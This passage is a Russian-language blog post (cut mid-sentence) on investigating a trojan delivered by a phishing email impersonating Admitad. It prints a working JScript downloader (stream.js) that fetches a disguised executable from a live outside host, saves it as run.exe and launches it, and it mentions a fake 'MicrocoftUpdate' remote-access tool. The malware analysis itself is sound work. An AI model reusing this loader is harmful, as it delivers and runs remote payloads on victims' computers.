{"id":278089,"date":"2016-04-12T10:30:01","date_gmt":"2016-04-12T06:30:01","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=278089"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=278089","title":{"rendered":"\u0421\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0439 \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u0438\u0439 \u043a\u043e\u043d\u044c: \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f"},"content":{"rendered":"

<\/p>\n

<\/div>\n

<\/a>
\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442!<\/p>\n

\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0432\u0430\u043c \u043e\u0431 \u043e\u0434\u043d\u043e\u043c \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u043e\u043c \u043a\u043e\u043d\u0435, \u0437\u0430\u0431\u0440\u0435\u0434\u0448\u0435\u043c \u0432 \u043e\u0433\u043e\u0440\u043e\u0434 \u043c\u043e\u0435\u0433\u043e \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0435\u0433\u043e \u0437\u043d\u0430\u043a\u043e\u043c\u043e\u0433\u043e, \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u044f \u0432\u044b\u0433\u043e\u043d\u044f\u043b \u043d\u0435\u0437\u0432\u0430\u043d\u043e\u0433\u043e \u0433\u043e\u0441\u0442\u044f, \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443 \u043d\u0435\u0433\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u0438 \u043a\u0430\u043a\u0438\u0435 \u0443\u0440\u043e\u043a\u0438 \u0438\u0437 \u0432\u0441\u0435\u0433\u043e \u044d\u0442\u043e\u0433\u043e \u044f \u0432\u044b\u043d\u0435\u0441.<\/p>\n

\u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u2014 \u0434\u043e\u0431\u0440\u043e \u043f\u043e\u0436\u0430\u043b\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434 \u043a\u0430\u0442!
<\/a> <\/p>\n

\u0427\u0430\u0441\u0442\u044c \u043f\u0435\u0440\u0432\u0430\u044f: \u043d\u0430\u0447\u0430\u043b\u043e<\/h2>\n

\u041d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0432\u0441\u0451 \u043d\u0435\u0434\u0435\u043b\u0438 \u0442\u0440\u0438 \u043d\u0430\u0437\u0430\u0434 \u0442\u0451\u043f\u043b\u044b\u043c \u0432\u0435\u0441\u0435\u043d\u043d\u0438\u043c \u0434\u043d\u0451\u043c, \u043a\u043e\u0433\u0434\u0430 \u043a\u043e \u043c\u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043d\u0438\u043b \u043c\u043e\u0439 \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0438\u0439 \u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0439 \u0438 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b \u0432\u043e\u0442 \u0442\u0430\u043a\u0443\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e: \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0438\u043d\u0443\u0442 \u043d\u0430\u0437\u0430\u0434 \u043e\u043d \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0430 email \u043f\u0438\u0441\u044c\u043c\u043e \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Admitad, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443 \u043d\u0435\u0433\u043e \u0434\u0435\u043b\u043e\u0432\u044b\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044f. \u041f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f:<\/p>\n

\u0423\u0432\u0430\u0436\u0430\u0435\u043c\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Admitad \u0423\u0432\u0435\u0434\u043e\u043c\u043b\u044f\u0435\u043c \u0432\u0430\u0441 \u043e \u043d\u043e\u0432\u043e\u0432\u0432\u0435\u0434\u0435\u043d\u0438\u044f\u0445: \u0421 23.03.16 \u0418\u0437\u043c\u0435\u043d\u0451\u043d \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u043d\u0430\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u044f \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0432\u044b\u043f\u043b\u0430\u0442. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0441\u043c. \u0412\u043b\u043e\u0436\u0435\u043d\u0438\u0435. \u0421 25.03.16 \u0432\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043d\u0430\u043b\u043e\u0433\u043e\u043e\u0431\u043b\u0430\u0436\u0435\u043d\u0438\u044f (\u041d\u0414\u0421) \u043d\u0430 \u0432\u0441\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b AD. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u041d\u0414\u0421 \u0434\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 AD \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0438. \u0421 \u0423\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c Admitad Support.<\/code><\/p>\n

\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u043c \u0437\u043d\u0430\u0447\u0438\u043b\u0441\u044f Admitad Support. \u041d\u0443 \u0438, \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u0431\u044b\u043b \u043f\u0440\u0438\u0430\u0442\u0442\u0430\u0447\u0435\u043d RAR-\u0430\u0440\u0445\u0438\u0432 \u0441 XLS-\u0444\u0430\u0439\u043b\u043e\u043c \u0432\u043d\u0443\u0442\u0440\u0438.<\/p>\n

\u0410\u0440\u0445\u0438\u0432 \u043e\u043d, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0430\u043b, XLS-\u0444\u0430\u0439\u043b \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b \u0438 (\u0442\u0430-\u0434\u0430\u0430\u0430\u0430!) \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u043b \u0437\u0430\u043f\u0443\u0441\u043a \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Excel \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u044b \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u043b \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u043e\u0435 \u0442\u043e\u043b\u043a\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e \u043a\u0430\u043a\u0438\u0435-\u0442\u043e \u043c\u0430\u043a\u0440\u043e\u0441\u044b (\u0447\u0451\u0440\u0442 \u0435\u0433\u043e \u0437\u043d\u0430\u0435\u0442 \u2014 \u0447\u0442\u043e \u044d\u0442\u043e \u0442\u0430\u043a\u043e\u0435, \u0434\u0430 \u0438 \u0441\u043b\u043e\u0432\u043e \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u0434\u0443\u0440\u0430\u0446\u043a\u043e\u0435). \u041d\u0443 \u0438 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043e\u043d \u0443\u0432\u0438\u0434\u0435\u043b \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0441\u0447\u0451\u0442 \u043d\u0430 \u043e\u043f\u043b\u0430\u0442\u0443 \u0437\u0430 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a\u0430, \u043d\u0430\u0441\u0442\u0443\u043f\u0438\u043b\u043e \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u0440\u043e\u0437\u0440\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0435\u0433\u043e \u0436\u0435\u0441\u0442\u043e\u043a\u043e \u043e\u0431\u043c\u0430\u043d\u0443\u043b\u0438. \u041e\u043d \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u043f\u043e\u0434\u0445\u0432\u0430\u0442\u0438\u043b \u043a\u0430\u043a\u0443\u044e-\u0442\u043e \u0438\u043d\u0444\u0435\u043a\u0446\u0438\u044e \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u043c\u0435\u043d\u044f \u0433\u043b\u044f\u043d\u0443\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u2014 \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0430\u0432\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u043d\u0435\u0451.<\/p>\n

\u042f \u0432\u044b\u0441\u043b\u0443\u0448\u0430\u043b \u0438\u0441\u0442\u043e\u0440\u0438\u044e, \u043f\u043e\u0436\u0443\u0440\u0438\u043b \u0435\u0433\u043e \u043d\u0435\u043c\u043d\u043e\u0433\u043e, \u043f\u043e\u0441\u043e\u0447\u0443\u0432\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0435\u043c\u0443 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0422\u0438\u043c\u0432\u044c\u044e\u0432\u0435\u0440 \u2014 \u043f\u043e\u0442\u043e\u043c\u0443 \u043a\u0430\u043a \u0435\u0445\u0430\u0442\u044c \u0447\u0435\u0440\u0435\u0437 \u0432\u0435\u0441\u044c \u0433\u043e\u0440\u043e\u0434 \u0431\u044b\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u043d\u0438\u0432\u043e.<\/p>\n

\u0427\u0430\u0441\u0442\u044c \u0432\u0442\u043e\u0440\u0430\u044f: \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u043e\u0431\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435<\/h2>\n

\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0422\u0438\u043c\u0432\u044c\u044e\u0432\u0435\u0440, \u044f \u043d\u0430\u0447\u0430\u043b \u043e\u0431\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435.<\/p>\n

\u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u0430\u0442\u0442\u0430\u0447 \u0431\u044b\u043b \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u043d\u0430 Virustotal: \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 0\/56. \u0421\u0432\u0435\u0436\u0430\u043a \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f.
\u0417\u0430\u0442\u0435\u043c \u044f \u043d\u0430\u0447\u0430\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u043d\u0430 \u0434\u0438\u0441\u043a\u0435 \u0441\u0432\u0435\u0436\u0438\u0435 \u0444\u0430\u0439\u043b\u044b. \u0422\u0430\u043a\u043e\u0432\u044b\u0435 \u043d\u0430\u0448\u043b\u0438\u0441\u044c \u0432 \u043f\u0430\u043f\u043a\u0435 temp: \u0442\u0430\u043c \u0441\u0440\u0435\u0434\u0438 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0431\u0430\u0440\u0430\u0445\u043b\u0430 \u043b\u0435\u0436\u0430\u043b\u043e \u0434\u0432\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u0430: run.exe \u0438 stream.js.<\/p>\n

\u0412\u043e\u0442 \u0442\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u0438\u0437\u043d\u0443\u0442\u0440\u0438 stream.js<\/b><\/p>\n
\n
(function (Global){  function CreateObject(ProgId) {  return new ActiveXObject(ProgId); }  var FSO = fso = CreateObject("Scripting.FileSystemObject"); var WshShell = CreateObject("WScript.Shell");  function tmp() {  var uyeifds = new ActiveXObject("Shell.Application");  return uyeifds; }  function isFile(Path) {  Path = WshShell.ExpandEnvironmentStrings(Path);  return fso.FileExists(Path); }  function shl(rto) {  tmp().ShellExecute(rto,"","","open","0"); }  function DeleteFile(Path) {     if (\/Array\/i.test(Path.constructor+""))     {   for (var i=0, l=Path.length;i<l;i++)   DeleteFile(Path[i]);   return;     }   Path = WshShell.ExpandEnvironmentStrings(Path);  try  {   if (isFile(Path))   FSO.GetFile(Path).Delete(true);  } catch (e) {} }  function DownloadFileFromURL(Url, FileDest) {  var msx = "Msxml2";  if (!FileDest || !Url) return null;   var ge = "GE";   FileDest = WshShell.ExpandEnvironmentStrings(FileDest);  msx = msx + ".XMLHTTP";  DeleteFile(FileDest);  var oXMLHTTP = WScript.CreateObject(msx);  oXMLHTTP.open (ge + "T", Url, false);  oXMLHTTP.send(null);  var oADOStream = CreateObject("ADO" + "DB.Stream");  with (oADOStream){      Mode = 3;      Type = 1;      Open()      Write (oXMLHTTP.responseBody);      SaveToFile(FileDest, 2);      Close();      return FileDest;  } }  var tor1="%TMP%\\\\run.e"; var tor2="xe";   try  {  FSO.GetFile("\\\\\\\\WORKOUT\\\\..hj");  } catch (e)  {   var Url="http:\/\/s2.zalivalka.ru\/download\/344314\/231.jpg";  DownloadFileFromURL(Url,tor1+tor2);   shl(WshShell.ExpandEnvironmentStrings(tor1+tor2));  } })(this) <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u0411\u0435\u0433\u043b\u044b\u0439 \u043e\u0441\u043c\u043e\u0442\u0440 \u043f\u0430\u0446\u0438\u0435\u043d\u0442\u0430 \u0434\u0430\u043b \u043f\u043e\u043d\u044f\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0433\u0440\u0443\u0437\u0438\u0442 \u0444\u0430\u0439\u043b htt\u0440:\/\/s2.zalivalka.ru\/download\/344314\/231.jpg, \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e \u0432 run.exe \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442. \u0417\u0434\u0435\u0441\u044c \u0432 URL \u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u043b \u0432 \u0430\u0431\u0431\u0440\u0435\u0432\u0438\u0430\u0442\u0443\u0440\u0435 http \u043b\u0430\u0442\u0438\u043d\u0441\u043a\u0443\u044e ‘p’ \u043d\u0430 \u0440\u0443\u0441\u0441\u043a\u0443\u044e ‘\u0440’ \u2014 \u0447\u0442\u043e\u0431\u044b URL \u043d\u0435 \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u043b\u0441\u044f \u0432 \u043b\u0438\u043d\u043a. \u041d\u0430 run.exe Virustotal \u0442\u0430\u043a\u0436\u0435 \u0441\u043a\u0440\u043e\u043c\u043d\u043e \u043d\u0435 \u043e\u0442\u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043b.<\/p>\n
  \u041b\u0430\u0434\u043d\u043e \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f \u2014 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b \u043f\u043e\u0438\u0441\u043a \u0441\u0432\u0435\u0436\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435. \u0421\u043a\u043e\u0440\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u0441\u044c \u043f\u0430\u043f\u043a\u0430 "%appdata%\\MicrocoftUpdate\\" \u0441 \u043a\u0443\u0447\u043a\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432\u043d\u0443\u0442\u0440\u0438. \u0414\u0430, \u0434\u0430, \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a \u2014 Microc<\/u>oft \u2014 \u0447\u0435\u0440\u0435\u0437 ‘c’. \u0423\u0436 \u043d\u0435 \u0437\u043d\u0430\u044e \u2014 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0431\u044b\u043b\u0430 \u0441\u0434\u0435\u043b\u0430\u043d\u0430 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430 \u0438\u043b\u0438 \u043d\u0435\u0442, \u043d\u043e \u043e\u043d\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043b\u0435\u0433\u0447\u0438\u043b\u0430 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u043f\u043e\u0438\u0441\u043a \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u0432\u043d\u0435\u0441\u0451\u043d\u043d\u044b\u0445 \u0432 \u0440\u0435\u0435\u0441\u0442\u0440. \u0412 \u044d\u0442\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 exe-\u0448\u043d\u0438\u043a \u0431\u044b\u043b \u0432\u0441\u0435\u0433\u043e \u043e\u0434\u0438\u043d: ctfmon.exe. \u0415\u0441\u043b\u0438 \u043a\u0442\u043e \u043f\u043e\u0434\u0437\u0430\u0431\u044b\u043b, \u0442\u043e \u043d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u0442\u0430\u043a \u043a\u043e\u0433\u0434\u0430-\u0442\u043e \u043d\u0430\u0437\u044b\u0432\u0430\u043b\u0441\u044f \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u0435\u043b\u044c \u0440\u0430\u0441\u043a\u043b\u0430\u0434\u043a\u0438 \u043a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u044b \u0432 \u041e\u0421 Windows XP.<\/p>\n
  \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043f\u043a\u0443 \u2014 \u0447\u0442\u043e\u0431\u044b \u0432\u0438\u0440\u0443\u0441, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u044f \u0435\u0449\u0451 \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u043d\u0435 \u0441\u043c\u043e\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0438\u0437 \u043d\u0435\u0451. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u043f\u043a\u0443 \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u043b\u0430\u0441\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u0435\u0439. \u0410 \u043d\u0435 cftmon.exe \u043b\u0438 \u0438\u0437 \u043d\u0435\u0451 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0438 \u043d\u0435 \u0434\u0430\u0451\u0442 \u043c\u043d\u0435 \u044d\u0442\u043e\u0433\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c? \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f. \u041e\u0442\u043a\u0440\u044b\u043b \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0437\u0430\u0434\u0430\u0447 \u2014 \u043d\u0443 \u0442\u0430\u043a \u0438 \u0435\u0441\u0442\u044c \u2014 \u0432\u043e\u0442 \u043e\u043d, \u0440\u043e\u0434\u0438\u043c\u044b\u0439. \u0422\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u0435\u0433\u043e \u0438 \u043f\u0430\u043f\u043a\u0430 \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043b\u0430\u0441\u044c.<\/p>\n
  \u0417\u0430\u0442\u0435\u043c \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b ctfmon.exe \u043d\u0430 Virustotal. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0431\u044b\u043b \u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u0441\u0442\u0440\u0430\u0448\u043d\u044b\u0439 \u2014 \u0447\u0442\u043e-\u0442\u043e \u043e\u043a\u043e\u043b\u043e 5\/56, \u043f\u0440\u0438\u0447\u0451\u043c \u044d\u0442\u0438 \u043f\u044f\u0442\u0435\u0440\u043e \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u0438 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0438\u0440\u0443\u0441, \u0430 \u0442\u0430\u043a-\u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u043e\u0435 RiskWare \u2014 \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c. \u0422\u043e\u0433\u0434\u0430 \u044f \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0432 \u043f\u0430\u043f\u043a\u0443 temp \u0438 \u0432 \u044d\u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443: \u043f\u0430\u043f\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u0443\u0441\u0442\u0430. \u041f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e \u0441\u043e \u043c\u043d\u043e\u0439 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u043f\u043e\u043a\u043e\u043f\u0430\u043b\u0441\u044f \u043d\u0435\u043a\u0442\u043e, \u0441\u043e\u0431\u0440\u0430\u043b \u0432\u0441\u0451, \u0447\u0442\u043e \u0435\u043c\u0443 \u0431\u044b\u043b\u043e \u043d\u0443\u0436\u043d\u043e, \u0430\u043a\u043a\u0443\u0440\u0430\u0442\u043d\u043e \u043f\u0440\u0438\u0431\u0440\u0430\u043b\u0441\u044f \u0437\u0430 \u0441\u043e\u0431\u043e\u0439 \u0438 \u0443\u0448\u0451\u043b.<\/p>\n
  \u0427\u0451\u0440\u0442, \u0447\u0451\u0440\u0442, \u0447\u0451\u0440\u0442! \u041c\u043e\u044f \u043b\u0435\u043d\u044c \u0434\u0430\u043b\u0430 \u043d\u0435\u0434\u0440\u0443\u0433\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u0432\u043e\u0451 \u0447\u0451\u0440\u043d\u043e\u0435 \u0434\u0435\u043b\u043e. \u042f \u043d\u0430\u0431\u0440\u0430\u043b \u0442\u0435\u043b\u0435\u0444\u043e\u043d \u0437\u043d\u0430\u043a\u043e\u043c\u043e\u0433\u043e, \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0435\u0433\u043e \u0432\u044b\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440, \u0432\u0437\u044f\u043b \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0438 \u043f\u043e\u0435\u0445\u0430\u043b \u043a \u043d\u0435\u043c\u0443 \u0434\u043e\u043c\u043e\u0439.<\/p>\n
\u0427\u0430\u0441\u0442\u044c \u0442\u0440\u0435\u0442\u044c\u044f: \u043f\u0440\u0435\u043f\u0430\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043d\u044f<\/h2>\n
  \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0432\u0438\u0432\u0438\u0441\u0435\u043a\u0446\u0438\u0438 \u043d\u0430 \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0431\u044b\u043b\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b Windows 7, Microsoft Office, Process Monitor \u0438 WireShark. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0432 \u0432\u0438\u0440\u0443\u0441, \u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u043e\u0436\u0434\u0430\u043b \u2014 \u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u0442 \u0432\u0441\u0435 \u0441\u0432\u043e\u0438 \u0434\u0435\u043b\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442 ctfmon.exe, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043b ctfmon \u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b \u043a \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044e \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0445 \u043b\u043e\u0433\u043e\u0432.<\/p>\n
  \u0418\u0437 \u043b\u043e\u0433\u0430 Process Monitor-\u0430 \u0441\u043a\u043e\u0440\u043e \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e run.exe \u2014 \u044d\u0442\u043e \u0441\u0430\u043c\u043e\u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u044e\u0449\u0438\u0439\u0441\u044f \u0430\u0440\u0445\u0438\u0432. \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u044f \u043e\u0442\u043a\u0440\u044b\u043b \u0435\u0433\u043e \u043a\u0430\u043a \u0430\u0440\u0445\u0438\u0432: \u043d\u0443 \u0442\u0430\u043a \u0438 \u0435\u0441\u0442\u044c \u2014 \u0432\u043d\u0443\u0442\u0440\u0438 \u0434\u0432\u0430 \u0444\u0430\u0439\u043b\u0430: t10.bat \u0438 poi.exe. \u0412\u044b\u0442\u0430\u0449\u0438\u0432 \u0438\u0437 \u0430\u0440\u0445\u0438\u0432\u0430 t10.bat \u044f \u0440\u0435\u0448\u0438\u043b \u0435\u0433\u043e 